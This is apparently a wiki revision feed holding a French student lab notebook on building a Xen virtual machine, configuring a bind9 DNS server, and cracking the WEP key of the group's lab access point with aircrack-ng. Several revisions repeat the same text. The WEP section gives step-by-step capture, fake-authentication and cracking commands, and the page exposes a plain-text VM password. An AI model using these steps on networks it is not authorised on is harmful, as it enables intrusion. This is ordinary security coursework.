&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt install aircrack&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60044</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60044"/>
				<updated>2022-11-28T09:36:23Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt install aircrack&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.png]]&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:WEP_Liste.jpg&amp;diff=60043</id>
		<title>Fichier:WEP Liste.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:WEP_Liste.jpg&amp;diff=60043"/>
				<updated>2022-11-28T09:27:11Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60042</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60042"/>
				<updated>2022-11-28T09:26:53Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt install aircrack&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59669</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59669"/>
				<updated>2022-11-10T10:52:34Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* Création de la VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59668</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59668"/>
				<updated>2022-11-10T10:52:00Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* Création de la VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
&lt;br /&gt;
